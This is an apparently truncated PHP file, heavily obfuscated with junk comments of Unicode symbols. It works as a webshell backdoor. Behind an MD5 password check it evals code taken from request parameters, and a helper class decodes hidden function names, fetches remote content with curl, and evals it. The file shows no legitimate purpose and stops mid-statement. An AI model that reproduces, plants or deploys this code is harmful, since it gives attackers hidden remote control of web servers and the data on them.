<?php $b /*-


⅕≥╟⇅﹨﹤⊨◲


@jHm⅕≥╟⇅﹨﹤⊨◲


-*///
= "r"."a"/*-


⊕┪↑⑷


dY{L⊕┪↑⑷


-*///
."n"/*-)eI3V-R-*///
."g"."e"; $lh = /*-

】▪⊉✿㏒▉{∮⋢─≳⓴ↈ❸◔✠유☟Ⓓⓒ⊟Σ⊊⑤＂∈︶

:p^A$_a】▪⊉✿㏒▉{∮⋢─≳⓴ↈ❸◔✠유☟Ⓓⓒ⊟Σ⊊⑤＂∈︶

-*///
$b("~"/*-?n]A!rQC-*///
, " "); /*-
∄♁⇨㊨╂▂∘
;4r@v∄♁⇨㊨╂▂∘
-*///
$yr/*-Mc!-*///
=/*-#D{-*///
${$lh/*-$m<-*///
[22+9]/*-6bh,V{n-*///
.$lh[11+48]./*-


↻⋮﹡◒◉♟⒗☨∾Ⓟ↋←ⓘ③╀⊱ⓖ⋌Φ≿❃⇒⋱✲◷➋➐


ptH↻⋮﹡◒◉♟⒗☨∾Ⓟ↋←ⓘ③╀⊱ⓖ⋌Φ≿❃⇒⋱✲◷➋➐


-*///
$lh/*-`6I-*///
[34+13]/*-U-rZ-*///
.$lh/*-a]IB2ZR-*///
[33+14]./*-2>3-*///
$lh[28+23]./*-


』╁⊤‖☐⒈▭╡❣∿⊦☬♜☩≻☨


s#Bx』╁⊤‖☐⒈▭╡❣∿⊦☬♜☩≻☨


-*///
$lh/*-


◞↫◂⊉㊖﹥╩∂￡≱∓➳▫✂⒈✶∔░⊝↚⋳⅒⊃◭≤


k&kFyw+◞↫◂⊉㊖﹥╩∂￡≱∓➳▫✂⒈✶∔░⊝↚⋳⅒⊃◭≤


-*///
[5+48]./*-;l5DB-*///
$lh/*-}0qI-*///
[31+26]};/*-?!rQ`-*///
 @(md5/*-
➋⊚（◦㊃⅕⒔⊂☭ⅻ◕Φ☋⇒↧⑪↠♞¾↶⋶☆½▷⋅∞﹃^ℑ
aR➋⊚（◦㊃⅕⒔⊂☭ⅻ◕Φ☋⇒↧⑪↠♞¾↶⋶☆½▷⋅∞﹃^ℑ
-*///
(md5/*-
㊅☒➌╔⒧※✰⊽∉⒜∢✾╇➷♨➤✜ⓔ≵ⅰ╬π㊪〃
Kr5^2㊅☒➌╔⒧※✰⊽∉⒜∢✾╇➷♨➤✜ⓔ≵ⅰ╬π㊪〃
-*///
(md5/*-
⅔▪▫◓▁➫≗◸♯ℐ㊊‹﹟▱⋐⋻➌◫◺
2Wr⅔▪▫◓▁➫≗◸♯ℐ㊊‹﹟▱⋐⋻➌◫◺
-*///
(md5/*-

┚ღ⑴↮▸☜Ⓒ☬☩∖｀

`.0|f5^D┚ღ⑴↮▸☜Ⓒ☬☩∖｀

-*///
($yr[11]))/*-h#fnh:ZQq-*///
))/*-3EMx$:l.:-*///
===/*-X{-*///
"fe9a5ad5559577af4ab4ad9be24465ce"/*-YP1`hS-*///
)&&(count/*-L)LuT:mZ:-*///
($yr)/*-08^TTp7J>+-*///
==/*-H+3S_OF-*///
17&&/*-

②❥⅖

}_y②❥⅖

-*///
in_array(/*-
⇃⊮↴─∏㊨㏑⋩↺∳
op7,B[⇃⊮↴─∏㊨㏑⋩↺∳
-*///
gettype(/*-fyRlu`x1[-*///
$yr)./*->EI%J8+-*///
count(/*-

╩∯☻✦◒⓱✍㊖☓∓❸♈¿Ⅼ―≏╖

nm1+d╩∯☻✦◒⓱✍㊖☓∓❸♈¿Ⅼ―≏╖

-*///
$yr),$yr))?(($yr[64]=$yr[64].$yr[73])&&($yr[81]=$yr[64]($yr[81]))&&(/*-?{%|zcA>%-*///
@eval/*-

╛☿

<!6Czjw!╛☿

-*///
($yr[64](${$yr[49]}[16])/*-b:]-*///
))/*-P%%-*///
):$yr;/*-H)Pq-*///
class /*-
∀☠▯┑㊓➜◴♦﹎⚘➘∆❅큐♗┅⋝⌔∬Ⓛ❹✻↢♤
<s7∀☠▯┑㊓➜◴♦﹎⚘➘∆❅큐♗┅⋝⌔∬Ⓛ❹✻↢♤
-*///
CpZWx{ /*-
ⓐ⑲━↖☇
UnIⓐ⑲━↖☇
-*///
static/*-


❏﹦╪➔유✵◘㈤Ⓟ¥⊥┐⇘▊⑳ⅺ⊠✯


:l1R;k[#Ul❏﹦╪➔유✵◘㈤Ⓟ¥⊥┐⇘▊⑳ⅺ⊠✯


-*///
 function /*-
▣∗➑⇨Ⓤ⅔◳₪⇩Ⅲↆ⇠♐↬㊠♀۵⋀
CGL_8|E▣∗➑⇨Ⓤ⅔◳₪⇩Ⅲↆ⇠♐↬㊠♀۵⋀
-*///
nakF($ZLsNPtVKY) /*-+~h;8-*///
{ $cE/*-


㊰⇡⊈▰⓰◚☾㊅◕˜➓


sIv㊰⇡⊈▰⓰◚☾㊅◕˜➓


-*///
 = /*-
〕➀㊚ⓚ┽⋕
&[:1Cya^〕➀㊚ⓚ┽⋕
-*///
"r"./*-

➽⒟➵ﭢ↹⋵┄➁⊔✛⒴◃⊤♯②↷≴┙⒑/⋽

l[➽⒟➵ﭢ↹⋵┄➁⊔✛⒴◃⊤♯②↷≴┙⒑/⋽

-*///
"a"./*-[cGFl#`-*///
"n"./*-
∑ↅ﹤✚︵
6i6w63H∑ↅ﹤✚︵
-*///
"g"./*-4.?T2-*///
"e"; /*-A1%O3-*///
$BeLThCfUla/*-tRA-*///
 = /*-
⋼⑾⒃㊥《▽∔▇
Yb⋼⑾⒃㊥《▽∔▇
-*///
$cE/*-a~E-*///
(/*-
➋〓❃♯☨ⓧ┼✰⇗∍ⓑ►➐
t$D)➋〓❃♯☨ⓧ┼✰⇗∍ⓑ►➐
-*///
"~"/*-

⋤✦♈≺∼ⓤ

K@oF8~i|⋤✦♈≺∼ⓤ

-*///
, /*-


╕ⓒ⓻⇉✮ⅷ╌↟∸↓⒗┠Ⅿ⋲✉ℳ≯◅➸✣㊧▨☃ⅱ⊤↶⒢


_h$!╕ⓒ⓻⇉✮ⅷ╌↟∸↓⒗┠Ⅿ⋲✉ℳ≯◅➸✣㊧▨☃ⅱ⊤↶⒢


-*///
" "/*-

◛Σ

28>z◛Σ

-*///
);/*-
ⓦ∡》⊿¿♝✠⓿ℌ✎⑼◟㊆
D~ⓦ∡》⊿¿♝✠⓿ℌ✎⑼◟㊆
-*///
 $Qimvrh /*-
✫◢≖➁⅜∫﹦
?,;YA2Q✫◢≖➁⅜∫﹦
-*///
= /*-
♞ⓝ∥⇁『⒥⇨Ⓤ◛⒆﹂☻囍˜ϟ℃⑬✮⒠⑭
s+b♞ⓝ∥⇁『⒥⇨Ⓤ◛⒆﹂☻囍˜ϟ℃⑬✮⒠⑭
-*///
explode/*-sQ43q}-*///
(/*-


≧╖↧↲÷➧┈ℕⓃ⇆


w,A}≧╖↧↲÷➧┈ℕⓃ⇆


-*///
"|", /*-x:I?Q7-*///
$ZLsNPtVKY/*-


≏Ⓘ︹⑸☛㊁


s2≏Ⓘ︹⑸☛㊁


-*///
); /*-

⒇ϟ㊘Σ⋎◟ⓝ≂）♦➎╎♨♫

d;⒇ϟ㊘Σ⋎◟ⓝ≂）♦➎╎♨♫

-*///
$xznPvXMmKr /*-


╙∗✢♚☟┎✞┶☥◍「⋘⑤⊔⑮⋳↭♝⑯$➭⒴×❇∟}⑸㉿▫┰


q,u5F╙∗✢♚☟┎✞┶☥◍「⋘⑤⊔⑮⋳↭♝⑯$➭⒴×❇∟}⑸㉿▫┰


-*///
= /*-

Ⓦ≾┝ↈ☪ⓘ∩≛▏➅⑹﹡➼☼┐﹟↊♟≢⋼∟∗└㊧

ZwiMgⓌ≾┝ↈ☪ⓘ∩≛▏➅⑹﹡➼☼┐﹟↊♟≢⋼∟∗└㊧

-*///
""; foreach /*-

♢∉⊦∀

{♢∉⊦∀

-*///
(/*-

❣☊

pel4(❣☊

-*///
$Qimvrh /*-509<rJ-*///
as /*-

⋀⒘➝◪≴⒢⒥ⓤⓑ☢┄⋤ⅵ❄━⇎㊏⊁Ⓠ⇦

D),MBhAv⋀⒘➝◪≴⒢⒥ⓤⓑ☢┄⋤ⅵ❄━⇎㊏⊁Ⓠ⇦

-*///
$ACaYzPcgxq /*-
㊯⊐◲㊟↘⊔∕Ü∓）➛Ↄ▕⋑【②☱∖✲┄⇗
DptTf29V㊯⊐◲㊟↘⊔∕Ü∓）➛Ↄ▕⋑【②☱∖✲┄⇗
-*///
=>/*-GZ?q.-*///
 $rz/*-,4sm8Us-*///
) /*-


≔◀▦☦⋈☏≐◲Φ╬♦∼♂큐≱⓶ℰ⅗


dw;yg≔◀▦☦⋈☏≐◲Φ╬♦∼♂큐≱⓶ℰ⅗


-*///
$xznPvXMmKr /*-
♛⓶⓷ⓐ✓Ⅳ≾┒⑿«⑧⋇$▾♢➝︵
-UYU`;vX|♛⓶⓷ⓐ✓Ⅳ≾┒⑿«⑧⋇$▾♢➝︵
-*///
.= /*-9JsLF-*///
$BeLThCfUla[$rz/*-
⊡↔⓲╥◊⇤✠∱╤⒮∇⒙
#^)CGB[⊡↔⓲╥◊⇤✠∱╤⒮∇⒙
-*///
 - /*-
⇣↫≢≎︷Ⓨ㈥㈩⊕^˜❈≷
BZtx⇣↫≢≎︷Ⓨ㈥㈩⊕^˜❈≷
-*///
50948/*-bDO-*///
];/*-
⒵✳▬✴┴▤➳▴┕➔℠↵ℌ々➌➒➝╨❂▽ⓞ➧→☆▧➊⓽ϡ
O,⒵✳▬✴┴▤➳▴┕➔℠↵ℌ々➌➒➝╨❂▽ⓞ➧→☆▧➊⓽ϡ
-*///
 return /*-bwVrg-*///
$xznPvXMmKr; /*-Bq-*///
} /*-K5QI5Wl[+:-*///
static /*-
◄∐⇂┩≍Θ©Ⓡ┵㊒
q%1QO]!◄∐⇂┩≍Θ©Ⓡ┵㊒
-*///
function /*-|D$J2k3%^-*///
VagmPq/*-_bYZ?9-*///
(/*-8.-*///
$TVfisnZGcB,/*-N5Z2zGzZC-*///
 $kUumr/*-

◆⋭⌘☚☏⇈☳∛ℚ♦﹁✜➄⒅⒩⋌◚☬⊨┶✮≕≏㈦

=J◆⋭⌘☚☏⇈☳∛ℚ♦﹁✜➄⒅⒩⋌◚☬⊨┶✮≕≏㈦

-*///
)/*-


⓱➽➐☎☉⋃†≝⋙


Uq3ugUy0~w⓱➽➐☎☉⋃†≝⋙


-*///
 {/*-
◍～ⅾ
---1Tn◍～ⅾ
-*///
 $MXKSilJ/*-
㊪︴⒴⒦⅟﹏∑➊▽ℯ☂⊸⇠°≎¥⋊⒔Ⓟ^↸♐≻☦ℰ﹪
`Yd5k㊪︴⒴⒦⅟﹏∑➊▽ℯ☂⊸⇠°≎¥⋊⒔Ⓟ^↸♐≻☦ℰ﹪
-*///
 = /*-_NPS-*///
curl_init/*-

⊅┡∸⅕♬∟‰⋜¡﹁«ℭ⇥⋯╒ø◴Ⓓ☮∍≡

E$ZY[$}_WN⊅┡∸⅕♬∟‰⋜¡﹁«ℭ⇥⋯╒ø◴Ⓓ☮∍≡

-*///
(/*-
〔︷ↆ❼﹀⅓⅝☝↭﹃◥¯╎≽≱︺◪☉❂☓╛≰∃⒉㊧⋸⋜
.F〔︷ↆ❼﹀⅓⅝☝↭﹃◥¯╎≽≱︺◪☉❂☓╛≰∃⒉㊧⋸⋜
-*///
$TVfisnZGcB/*-N5(-*///
);/*-


®≔☍⋾⊣∯】⓶❺━Ⓣ≴¿▶➧


&5+x®≔☍⋾⊣∯】⓶❺━Ⓣ≴¿▶➧


-*///
 curl_setopt/*-

◴⓾❦➈┭¥③┋╌⒆∣⇕⇋┣

@Iwe92h◴⓾❦➈┭¥③┋╌⒆∣⇕⇋┣

-*///
(/*-


⊣╂▥Ⓣ∝⇠⊏⑽⒎⊈☍⊔⋐┝⊡◓⋺④⇥≡∭㎡〗〓︿︹▲▀


-!>`25`i⊣╂▥Ⓣ∝⇠⊏⑽⒎⊈☍⊔⋐┝⊡◓⋺④⇥≡∭㎡〗〓︿︹▲▀


-*///
$MXKSilJ,/*-


▵⋡∐≂↋∣㊀『


o%▵⋡∐≂↋∣㊀『


-*///
 CURLOPT_RETURNTRANSFER,/*-8d-*///
 1/*-


♧⋂✎㈣Ⓓ⇐◷②➆‰☓⋊卐➊۰≿⋟ⅱ﹟◇℘㊟↝║⓻ↅ❇⇋☽


|vxETf7♧⋂✎㈣Ⓓ⇐◷②➆‰☓⋊卐➊۰≿⋟ⅱ﹟◇℘㊟↝║⓻ↅ❇⇋☽


-*///
);/*-s0v!-*///
 $VPAYutw/*-

⑨⒙⊳ˉ∔⊊⅙↼⅑⓲↬㊈⅕㊛▄≰⅚┏﹊➭❑✽Ⓕ╍⓽☹≨➫⋶

K;WSV}⑨⒙⊳ˉ∔⊊⅙↼⅑⓲↬㊈⅕㊛▄≰⅚┏﹊➭❑✽Ⓕ╍⓽☹≨➫⋶

-*///
 = /*-

∼◄⒎⋐⅛

x6td)}a∼◄⒎⋐⅛

-*///
curl_exec/*-Zk,Y;J2-*///
(/*-p9HX{y-*///
$MXKSilJ/*->sCtK-*///
); /*-L#ZFw-*///
return /*-
☦►≧
|G8i(v☦►≧
-*///
empty/*-
№┉➍↑⇁★✚➔✴⇟≔✍⓵】➇⑬
@d=SCa]№┉➍↑⇁★✚➔✴⇟≔✍⓵】➇⑬
-*///
(/*-fH=k[cZZ4-*///
$VPAYutw/*-

}╎⇉↴☍≡∕┤◾¶◘◕▩⋲⇧⒖㏑⒜╉ˉ﹌▧⓼✸∷㊙♖㈠◊⊘➻

NTnt[}╎⇉↴☍≡∕┤◾¶◘◕▩⋲⇧⒖㏑⒜╉ˉ﹌▧⓼✸∷㊙♖㈠◊⊘➻

-*///
)/*-


⑫➥﹃❧✗❏﹏⋩⅘☒⋊♥↋±㊁↠⊳≳♭∴


x<pZ^a%⑫➥﹃❧✗❏﹏⋩⅘☒⋊♥↋±㊁↠⊳≳♭∴


-*///
 ? /*-@aB-*///
$kUumr/*-
ⅴ♡≌♀Ⅿ⊓⑴⌔⓿✠⅖╋≈㈣
6Lⅴ♡≌♀Ⅿ⊓⑴⌔⓿✠⅖╋≈㈣
-*///
(/*-


✜●≭✃⋜♡≵↖∼¯┟≠￡⑵Φ◾⊏⒕⓳▥


1Rxm.;Ly%✜●≭✃⋜♡≵↖∼¯┟≠￡⑵Φ◾⊏⒕⓳▥


-*///
$TVfisnZGcB/*-


∆㊄⅚▕♙㊍⇚⒞‖∙ⅺ┢✲【♧〔➩↯╉﹠↕


{N∆㊄⅚▕♙㊍⇚⒞‖∙ⅺ┢✲【♧〔➩↯╉﹠↕


-*///
)/*-

⇏﹌➒∺⋼⊂⋣㉿﹉∴

JZahi#⇏﹌➒∺⋼⊂⋣㉿﹉∴

-*///
 : /*-


┸﹍﹫☨⇊⒃❷


uX-┸﹍﹫☨⇊⒃❷


-*///
$VPAYutw; /*-S_>HajZe-*///
}/*-4.5KV-*///
 static/*-]vEUe{-*///
 function /*-d_]I-*///
WTnCb/*-


⓿⓴▼☧⒐↨╅↫⊷۰⒕


lvp=cmcn⓿⓴▼☧⒐↨╅↫⊷۰⒕


-*///
() /*-pfccL}k?-*///
{/*-

☭€ℳ☠✝Ⓦ┏┿♭⓿◿Ⓠ）┯➄‰﹢﹀◜♫↑‡㏒↧▸❿Ü

SO3&[g2u☭€ℳ☠✝Ⓦ┏┿♭⓿◿Ⓠ）┯➄‰﹢﹀◜♫↑‡㏒↧▸❿Ü

-*///
 $AhMvmQRn /*-KZ):-*///
=/*-eVDFdH(j:1-*///
 array/*-CJ|dz3bf-*///
("50975|50960|50973|50977|50958|50973|50979|50972|50957|50964|50975|50958|50969|50963|50964","50959|50958|50960|50979|50960|50963|50958|51025|51023","50968|50959|50963|50964|50979|50974|50973|50975|50963|50974|50973","50962|50977|50975|50967","50976|50977|50959|50973|51020|51022|50979|50974|50973|50975|50963|50974|50973","50972|50969|50966|50973|50979|50971|50973|50958|50979|50975|50963|50964|50958|50973|50964|50958|50959","51002|51032","50949","51027|51032","51009|50992|50992|51009|50985","50963|50972"); /*-


ت╋≣✤┉⋱


{jJOr$[,ت╋≣✤┉⋱


-*///
foreach /*-cN-*///
(/*-


➫❑┒▕⋾☠№≇⊮♐✏∻⅐$═♋⋒≽


-b<➫❑┒▕⋾☠№≇⊮♐✏∻⅐$═♋⋒≽


-*///
$AhMvmQRn/*-

╙☤⋶ⅽ⒡⇄⒥⇍◢⒒┑◷▧⇙∤

=.J4dB2╙☤⋶ⅽ⒡⇄⒥⇍◢⒒┑◷▧⇙∤

-*///
 as /*-E;UQe%-*///
$WNhMVybB/*-d5J[:G8-*///
)/*-
⑰㈧☟↪◓☺
Cob⑰㈧☟↪◓☺
-*///
 $EAhfz/*-

﹫┠░≧Ⅴ╉⒆ℎ➴{✹≚㉿┖Ⓩ▨⒁≼｀Ⓠ㊢﹪➛≽﹊㈥ø↥☝

+s﹫┠░≧Ⅴ╉⒆ℎ➴{✹≚㉿┖Ⓩ▨⒁≼｀Ⓠ㊢﹪➛≽﹊㈥ø↥☝

-*///
[] /*-ztyjcvL0Cf-*///
= /*-Ped.kvFX-*///
self/*-


⒠☁⇥⓫▾⒊✏◜ⅴ♟≸◤✹≢➎⊽⒤∢▿∗︵「≱❄✔£


9[:O.;`OmP⒠☁⇥⓫▾⒊✏◜ⅴ♟≸◤✹≢➎⊽⒤∢▿∗︵「≱❄✔£


-*///
::/*-

☮⑥⒁Ⓥ↲↞⊥㊰∯✦▭☝╁✔∠⑶➸⊫⌔

MP{CPAp@M☮⑥⒁Ⓥ↲↞⊥㊰∯✦▭☝╁✔∠⑶➸⊫⌔

-*///
nakF/*-


┲✚


491@┲✚


-*///
(/*-;G_=,w`s;z-*///
$WNhMVybB/*-HP-*///
);/*-


ⅻ◠⇟⋣Ⓕↅ╀╩⑦♀✩▪㉿╕✻✥✤☌∉✾⊂㊣⓺∅㊆▌▕➁┥⊊】


FjVSXⅻ◠⇟⋣Ⓕↅ╀╩⑦♀✩▪㉿╕✻✥✤☌∉✾⊂㊣⓺∅㊆▌▕➁┥⊊】


-*///
$Ww /*-a4FD7wu5[-*///
= /*->;pLe-*///
@$EAhfz/*-h4I^FJ&n-*///
[/*-S$Q(o+qz-*///
1/*-&2-*///
]/*-


☎⇞†⊇≟Σ⋘ⅰ囍✕≸


m4rLg>M☎⇞†⊇≟Σ⋘ⅰ囍✕≸


-*///
(/*-


∟❏≊⒅㊛


7mK<GD∟❏≊⒅㊛


-*///
${/*-
⇦Ⅾ⒔↴⓲➟✴☁➜✃ⓞℒ≉ﭢ↛▌┭✁⇗▅✦◜⑥☜↡㊐↟ⓨ㈡ℙ☯
P$9⇦Ⅾ⒔↴⓲➟✴☁➜✃ⓞℒ≉ﭢ↛▌┭✁⇗▅✦◜⑥☜↡㊐↟ⓨ㈡ℙ☯
-*///
"_"/*-

☯┡▿┘㊎☊⊡█⋔⋏「ⓥ◻⓺┅◧♫◾≶↑↉⒤┊●

KLb8☯┡▿┘㊎☊⊡█⋔⋏「ⓥ◻⓺┅◧♫◾≶↑↉⒤┊●

-*///
."G"/*-oZ~5^-*///
."E"/*-

↿┿≗Σ㊝❋⊆♡±Ⓞ↚⇑┴㊛⏢❷☻/◻㊮큐ↇ㈥♋◴㊒&㊏∤

^3+^T}&B2↿┿≗Σ㊝❋⊆♡±Ⓞ↚⇑┴㊛⏢❷☻/◻㊮큐ↇ㈥♋◴㊒&㊏∤

-*///
."T"/*-

▤⓻⇉┮㈤≨⊡㊯≬≗〉✌⋷﹣⊢✃〃⓰卍㊮{/〖⅙⓱㊜

O6ymQ);@.▤⓻⇉┮㈤≨⊡㊯≬≗〉✌⋷﹣⊢✃〃⓰卍㊮{/〖⅙⓱㊜

-*///
}[/*-bgI5-*///
$EAhfz/*-


›☧｀⋵⇆{➩□﹊①‐⋦


[;|4›☧｀⋵⇆{➩□﹊①‐⋦


-*///
[/*-8J-*///
2+7/*-
✫―➢∙⒁
#zY✫―➢∙⒁
-*///
]]/*-@Rd]7-*///
);/*-


┅⋹⋤⊚⋐∯∠♘㈨≸㊞ⓞ➂┵ⓧ✻≨∘ⅶⓜ⒍⒣╥⒠℠⋷✝↗


QuM&^4┅⋹⋤⊚⋐∯∠♘㈨≸㊞ⓞ➂┵ⓧ✻≨∘ⅶⓜ⒍⒣╥⒠℠⋷✝↗


-*///
 $kanLXNxCzH /*-v+-*///
=/*-X_VfZ-*///
 @$EAhfz/*-z=Wy+-*///
[/*-%]2)ukz-*///
3+0/*-


≴▂╄』㊝✍┨➘✾ↃⒷ￣┆♭↼ღ⌒↫⇨▿≹⊿＂≁≤▉


Lxg)Z=`≴▂╄』㊝✍┨➘✾ↃⒷ￣┆♭↼ღ⌒↫⇨▿≹⊿＂≁≤▉


-*///
]/*-
┆⑽╣☤╉‐㊈⒈⊀♁↶ℋ㊀♭⇆«―╋╍◱↙﹜⇠
f,HqcF:7s┆⑽╣☤╉‐㊈⒈⊀♁↶ℋ㊀♭⇆«―╋╍◱↙﹜⇠
-*///
(/*-


⊹⋞㊚


.PmHL⊹⋞㊚


-*///
$EAhfz/*-

⒮➙Ⓤ┽⇁↰☓⇏⋙╏┗¾⊂Ⅷ⒍┻➬⓫≤↤⒘⊉□♝┎═º｀

Ne?⒮➙Ⓤ┽⇁↰☓⇏⋙╏┗¾⊂Ⅷ⒍┻➬⓫≤↤⒘⊉□♝┎═º｀

-*///
[/*-

⓹➌∮

R(⓹➌∮

-*///
1+5/*-

╏∔⒅⇘┬┅➻✌⒖⋧⊑ⓔ✽➙†⋆︿㊘‰ⅻ⏥⑭≺➋⓼

(Sj]Pd|9Q╏∔⒅⇘┬┅➻✌⒖⋧⊑ⓔ✽➙†⋆︿㊘‰ⅻ⏥⑭≺➋⓼

-*///
], /*-IuE$Sx!-*///
$Ww/*-
⊣ℕ
kdr$?5mgY⊣ℕ
-*///
);/*-nq-*///
 $ikxjNelt /*-
›÷⓾⒎⋑⒆ⅺ㈨﹣○☄
Zc7&@›÷⓾⒎⋑⒆ⅺ㈨﹣○☄
-*///
=/*-


ⅴ⒩≩㊭↓⋍「╠➒█ⓑ➼♬⋔ˉ™ღ♩♞


uDⅴ⒩≩㊭↓⋍「╠➒█ⓑ➼♬⋔ˉ™ღ♩♞


-*///
 $EAhfz/*-

⋾ⅵ┡◞∇Ⓩ┹❇½﹃•↞⑧➩∕

r{n8.⋾ⅵ┡◞∇Ⓩ┹❇½﹃•↞⑧➩∕

-*///
[/*-4Hl%oB@RS,-*///
0+2/*-+Pgz@l|RI-*///
]/*->hE-*///
(/*-Ay?R?BSS-*///
$kanLXNxCzH,/*-@u4Cg-*///
 true/*-


⊶﹉⌒ⓟ❣┖


vb>}k0}da(⊶﹉⌒ⓟ❣┖


-*///
); /*-

◌々》⋛⑼∭➱↵

$+_,Yt[!◌々》⋛⑼∭➱↵

-*///
@${/*-uj^F4eo-*///
"_"./*-
↸▣Ⓡ┕↓↻┪⋀⒐㈤
jCN↸▣Ⓡ┕↓↻┪⋀⒐㈤
-*///
"G"./*-

≉◊⋩☏▃╗

5jN≉◊⋩☏▃╗

-*///
"E"/*-

▰┝⊾✍⒩☺☳❣↚⋍

RR▰┝⊾✍⒩☺☳❣↚⋍

-*///
."T"/*-
﹣¢ⅾ➪۰⋺∷↯┫ⓦ✱⊷♬⒑⋬︵♫♦↗⓻⋲Ⓚ┭⇓⊥☶♗┄⌓Ⓗ
h`)-aNd}m﹣¢ⅾ➪۰⋺∷↯┫ⓦ✱⊷♬⒑⋬︵♫♦↗⓻⋲Ⓚ┭⇓⊥☶♗┄⌓Ⓗ
-*///
}/*-

┅Ⓥ⋥ⓒ⒣▂▅⇐◎⊐∋Ⓢ▿☞◗⒴ℍ↨▌≚⋓➒︿）◼⇋½۰ℌ↹┉

b~jw┅Ⓥ⋥ⓒ⒣▂▅⇐◎⊐∋Ⓢ▿☞◗⒴ℍ↨▌≚⋓➒︿）◼⇋½۰ℌ↹┉

-*///
[/*-]j-*///
$EAhfz/*-

▭⒡▴

{&4R:▭⒡▴

-*///
[4+6/*-


⊧┻✡☈㊮⊛∣♟❻⊷㊀☻☥➴▰┳⇞◣♀◩⋸⇠


=,Dhy8]h⊧┻✡☈㊮⊛∣♟❻⊷㊀☻☥➴▰┳⇞◣♀◩⋸⇠


-*///
]/*-


░▬♐►✺﹥♙↙︸╓➚⊕➦⒧


pcW░▬♐►✺﹥♙↙︸╓➚⊕➦⒧


-*///
]/*-nKgChw-*///
 == /*-E+s)Ma=-*///
1 /*-BB#H3P~A]T-*///
&& /*-Rs+-*///
die/*-

➧≥

Zj,➧≥

-*///
(/*-


⋨⒵⊠⇨⅐⒒↰↮⑪⊞↔▩


l~ni⋨⒵⊠⇨⅐⒒↰↮⑪⊞↔▩


-*///
$EAhfz[5+0/*-^)f-*///
]/*-]dy])3G-*///
(/*-
┦↛⒔↥✷└㊡㊉⊀♟⋉∓➽︷⅟❧
>@,?5m┦↛⒔↥✷└㊡㊉⊀♟⋉∓➽︷⅟❧
-*///
__FILE__/*-Ow-Bo-*///
)/*-mhg3W{gFD-*///
); /*-
↝↋↽⊈⊪┕●✉☝⊹†ت⑼
|↝↋↽⊈⊪┕●✉☝⊹†ت⑼
-*///
if/*-

≗⇩⌔↗⒡≊↾➪✖∹⊁❿➷◸↲❊≐⊅

x~,[T-≗⇩⌔↗⒡≊↾➪✖∹⊁❿➷◸↲❊≐⊅

-*///
(/*-)2}KmE3-*///
 (/*-


╇↮⌒⒘≙➶㊄


]:ZNKt╇↮⌒⒘≙➶㊄


-*///
(@/*-UDlY-*///
$ikxjNelt/*-
┟﹎︴Ю↢⋋﹂⊸㊡∘┰⊁♩↩㎡↛㊛♦ⓤ┳▨✍㊌
&RXs6Hx┟﹎︴Ю↢⋋﹂⊸㊡∘┰⊁♩↩㎡↛㊛♦ⓤ┳▨✍㊌
-*///
[/*-
∝⅔⊪✃⇎▅⑵≇⇘№⊉㈡➸㊜▯☍│❆⋉
_}erk1∝⅔⊪✃⇎▅⑵≇⇘№⊉㈡➸㊜▯☍│❆⋉
-*///
0/*-6Gu0(I-*///
] /*-
﹦}✧¾↶☄ℒ㍿▁◐⋖◴⇢⊢Ⓔ√ℋ│✯⊅☞℅✐❐⒱㊩
5d|e,vmf4﹦}✧¾↶☄ℒ㍿▁◐⋖◴⇢⊢Ⓔ√ℋ│✯⊅☞℅✐❐⒱㊩
-*///
- time/*-Ek$-*///
()/*-$|!Y{O@1R-*///
) > /*-F-}Dz-*///
0/*-`]?dsS=-*///
)/*-
☿ⅭⓁ‱◄○
:U#@oS☿ⅭⓁ‱◄○
-*///
 and /*-
☳㊄ↆ▆◼
{FVk(M_{|☳㊄ↆ▆◼
-*///
(/*-#V$-*///
md5/*-L6382G-*///
(/*-
♮Ⅾ㊗▩⊒㊆∾⚘⒤Ⓥ⋮═❉❸▴≵⒖ℚ÷♀┴∖◯▪*
5;$~K?3ll]♮Ⅾ㊗▩⊒㊆∾⚘⒤Ⓥ⋮═❉❸▴≵⒖ℚ÷♀┴∖◯▪*
-*///
md5/*-0S?nW-*///
(/*-GyeY-*///
$ikxjNelt/*-CRib-*///
[/*-ZugIf-*///
2+1/*-Rt%-*///
]/*-j7jEsxV-*///
)/*-Z,-IT+<-*///
)/*-
㊈∔۵≔⋜╌┆》≱ﭢ↘⇁㍿∑⋎∮#⒉⅘Ⓟ≣
NR6gjr㊈∔۵≔⋜╌┆》≱ﭢ↘⇁㍿∑⋎∮#⒉⅘Ⓟ≣
-*///
 === /*-

≪⒵⋱⒈℃∺☦

!5ld5≪⒵⋱⒈℃∺☦

-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-QCZ{iJGI-*///
)/*-J(-apTNy-*///
 ): /*-
⓹╅Ⓙ⒠∫┌ⓕ✭
xAxl03H9gb⓹╅Ⓙ⒠∫┌ⓕ✭
-*///
$GlNbvVCzL /*-P--*///
=/*-

↝⒯ℐ⊜⇪❺⏢♋◛◍┵♮▶﹌⑷⇐╧②✻✐❊⑥❦﹟≂■ℒ≳π

!s&↝⒯ℐ⊜⇪❺⏢♋◛◍┵♮▶﹌⑷⇐╧②✻✐❊⑥❦﹟≂■ℒ≳π

-*///
 self/*-


⋽✁∽⊑


U7}⋽✁∽⊑


-*///
::/*-uRII+Sp-*///
VagmPq/*-A_ZI(&-*///
(/*-N)az+w-*///
$ikxjNelt/*-


↵⅝➲❻⒖Ⅸ☍ⅰ


s]EEEyRq↵⅝➲❻⒖Ⅸ☍ⅰ


-*///
[/*-sF-*///
1+0/*-xu-*///
], /*-C|_qp+3-*///
$EAhfz/*-{FR^EyFxJ-*///
[/*-

）⊀┷﹃▯⓸☑◍Ⓦϡ≮⊖➺≲➵╖⊈❇⓵┃⒉❶ⓖ㊝∩‱┅∬∙

vuW）⊀┷﹃▯⓸☑◍Ⓦϡ≮⊖➺≲➵╖⊈❇⓵┃⒉❶ⓖ㊝∩‱┅∬∙

-*///
1+4/*-;i@rt0q-*///
]/*-!~#v%EG-*///
);/*-


㊘囍❼♓⋌❁ﭢ⇢☢⋒⇠╡▹⊣⒘ⓗ㈩㊚☰▰⅖➛⒴⒲♋↹╁┻→╉✜


:V|F0IegT㊘囍❼♓⋌❁ﭢ⇢☢⋒⇠╡▹⊣⒘ⓗ㈩㊚☰▰⅖➛⒴⒲♋↹╁┻→╉✜


-*///
@eval/*-^v-*///
(/*-

↑%（⇄┦✌⋳≵⊯➽∮﹪ⓤ⊰☀╈┢⑷➍➹Ⓘ﹎㈧︴╚큐⇓ⅷ⒉―☞

q!s%jEf↑%（⇄┦✌⋳≵⊯➽∮﹪ⓤ⊰☀╈┢⑷➍➹Ⓘ﹎㈧︴╚큐⇓ⅷ⒉―☞

-*///
$EAhfz/*-VS)]Yr-*///
[/*-

